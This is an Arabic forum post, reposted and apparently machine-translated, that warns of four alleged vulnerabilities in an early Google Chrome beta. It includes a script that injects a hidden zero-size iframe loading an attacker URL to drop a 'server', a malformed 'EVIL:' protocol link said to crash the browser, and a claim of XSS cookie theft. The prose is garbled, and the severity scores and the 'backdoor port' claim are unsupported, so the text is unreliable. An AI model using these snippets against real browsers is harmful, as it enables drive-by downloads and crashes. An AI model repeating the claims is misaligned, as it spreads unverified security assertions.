|
تـم إكتشاف 4 ثغرات في متصفح Google Chrom الخاص بجوجل منهم ثغرتين من اكتشافي الخاص ..
الثغرة الأولى : تقوم بتنزيل خادم في نظام التشغيل الخاص بك
درجة الخطورة : 89%
المكتشف : nerex
## الطريقة ##
كود:
<sc ript >
docu ment.w rite('<iframe src=" URL" frameborder="0" width="0" height="0">');
</ s cript>
الثغرة الثانية : تصحيح اخطاء
درجة الخطورة : 99%
المكتشف : psy.echo
وصف :
وهي مسألة موجودة في كيف تتصرف مع الكروم - عمال غير مسمى في النسخه chrome.dll
0.2.149.27. أ يمكن ان يؤدي الى تحطم دون تفاعل المستخدم. عندما يقوم احد المستخدمين في هذا الصدد الى زيارة
وصلة خبيثة ، ولها غير معرف المعالج تليها 'الخاصة' ،
وقد تحطم الكروم مع صور الكروم رسالة النافذة "قف! صور الكروم قد تحطمت.
اعادة التشغيل الان؟ ". انها تكمن في التعامل مع شاشة عرض ebp عندما التعليمات التي اشار اليها
Eip سجل في 0x01002ff4.
## الطريقة ##
كود بلغة HTML:
="EV IL:%">H E RE</a >
الثغرة الثالثة : نوع Xss
درجة الخطورة : 100%
المكتشف : Redghost
## الوصف ##
خاضعة لأي طريقة لإستغلال سحب الكوكيز فهو لا يحتوي على اي أداة للأمان من سحب الكوكيز الخاص بك ..
## الطريقة ##
كود:
مثل اي طريقة لإستغلال ثغرات Xss يعني ليس لها طريقة محدده
يعني لو مثلا عندنا موقع اسمه
Www.mysite.com
هذا الموقع احد ملفاته مصابة بثغرة Xss
متصفح Firefox يحافظ على بقاء الكوكيز وكذلك متصفح IE7 & IE8 & Opera
هذا المتصفح لا يوجد فيه أداة للحماية من هالأساليب :detective
الثغرة الرابعة : خطأ برمجي
نوع الثغرة : أمنية
درجة الخطورة : 80%
المكتشف : Redghost
الضرر :
يجعل الجهاز بطئ جدا وربما يسبب امتلاء ذاكرة الرام المؤقتة ..
وربما يكون سببا في اختراق الجهاز 
## الطريقة ##
بعد تحليل البرنامج اكتشفت بوجود كود يسمح بألاتصال بمنفذ معين في الجهاز لإستخدامه كباب خلفي للبرنامج
حتى تستطيع شركة جوجل من البلاغ عن الأبديتس الخاص بالبرنامج
وهو عن طريق فتح منفذ معين بالجهاز
يتم الاتصال عليه حتى يمكن للخادم معرفة اصدار المتصفح لديك ..
ويمكن لأي هكر في هذة اللحظة من اختراق جهازك عن طريق هذا المنفذ
والخطأ البرمجي : اذا تم الاتصال عليه اكتر من مرة زي ما شفت الية العمل
يحصل للجهاز عملية مثل الفلوود تؤدى الى ضعف الجهاز وإمتلاء ذاكرة الرام
وأحيانا ارتفاع CPU .. 
وهذة صورة توضيحية لفحص الثغرة ببرنامج Rg Security 2009
والله يوفقنا على كشف باقي الثغرات 
ترجع حقوق الموضوع لمعهد التميز
منقول للافاده
والسلام عليكم ورحمه الله وبركاته
|
احذر من متصفح جوجل الجديد (الإصدار التجريبي) Google Chrome ثغرات بمتصفح جوجل الجديد
العرض العادي
